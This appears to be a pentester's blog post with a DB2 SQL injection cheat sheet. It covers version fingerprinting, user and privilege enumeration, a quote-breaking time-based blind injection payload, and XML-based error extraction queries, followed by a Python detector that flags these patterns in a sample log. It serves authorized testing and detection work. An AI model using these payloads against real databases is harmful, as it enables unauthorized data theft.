DB2 SQL injection cheat sheet

I’m sure we all (pentesters) make extensive use of pentestmonkey’s SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, the DB2 cheat sheet is one of the least complete on pentestmonkey’s website. It might be because it’s not a very common database engine and a fairly complex one. I’ve had the luck? of coming across lots of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following these lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey’s as the starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on Win32+DB2 v10.1.0, although I’ve also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that I’m not a DB2 expert, so if you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I’ve uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

Version*

select service_level from table(sysproc.env_get_inst_info()) as instanceinfo

select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)

select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo

select service_level,bld_level from sysibmadm.env_inst_info

Comments

select blah from foo -- comment like this (double dash)

Current User

select user from sysibm.sysdummy1

select session_user from sysibm.sysdummy1

select system_user from sysibm.sysdummy1

List Users*

DB2 uses OS accounts. Those with DB2 access can be retrieved with:

select distinct(authid) from sysibmadm.privileges -- priv required

select grantee from syscat.dbauth -- incomplete results

select distinct(definer) from syscat.schemata -- more accurate

select distinct(grantee) from sysibm.systabauth -- same as previous

List Password Hashes

N/A (OS User Accounts)

List Privileges

select * from syscat.tabauth -- shows privs on tables

select * from syscat.tabauth where grantee = current user -- shows privs for current user

' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 -- If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response. However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.

Serialize to XML (for error based)*

select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string

select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements

select xml2clob(xmlelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.

select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieves the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
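The flip side of the heavy-query timing trick and the XML serialization entries above is that they leave very recognisable statement text behind. As an added example (not part of the original cheat sheet), here is a small Python detector that runs signatures for those entries over a constructed DB2 statement log; the log lines, rule labels and function names are all my own assumptions, not anything from the post.

```python
import re

# Constructed sample of DB2 statement text as it might appear in a query or
# audit log (not real log data); one statement per line.
SAMPLE_LOG = """\
SELECT name, price FROM app.products WHERE id = 42
SELECT name FROM app.products WHERE id = '' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 --'
SELECT name FROM app.products WHERE id = '' union select xmlagg(xmlrow(table_schema)) from sysibm.tables --'
SELECT service_level FROM table(sysproc.env_get_inst_info()) as instanceinfo
SELECT name FROM app.products WHERE name = 'O''Reilly'
"""

# Each rule is (label, regex). The patterns mirror the cheat-sheet entries:
# catalog self-joins used as a delay, char-by-char inference on the user
# registers, XML aggregation of catalog rows, and sysproc version lookups.
RULES = [
    ("catalog self-join (time-based heavy query)",
     re.compile(r"from\s+sysibm\.columns\s+\w+\s*,\s*sysibm\.columns", re.I)),
    ("char-by-char inference on user/session",
     re.compile(r"ascii\s*\(\s*substr\s*\(\s*(user|session_user|system_user)\b", re.I)),
    ("XML serialization of catalog rows",
     re.compile(r"xml(agg|2clob)\s*\(\s*xml(row|element)\s*\(", re.I)),
    ("instance/version fingerprinting via sysproc",
     re.compile(r"sysproc\.env_get_(inst|prod)_info\s*\(", re.I)),
]

def scan_statement(stmt):
    """Return the labels of every rule that matches one SQL statement."""
    return [label for label, rx in RULES if rx.search(stmt)]

def scan_log(text):
    """Return (line_number, statement, labels) for each flagged line of a log."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        labels = scan_statement(line)
        if labels:
            hits.append((n, line, labels))
    return hits

if __name__ == "__main__":
    for n, stmt, labels in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(labels)}")
```

Application connections normally have no business touching SYSIBM, SYSCAT or SYSPROC at all, so in practice a single rule on those schema names catches most of this; the per-technique labels just make the alert easier to triage.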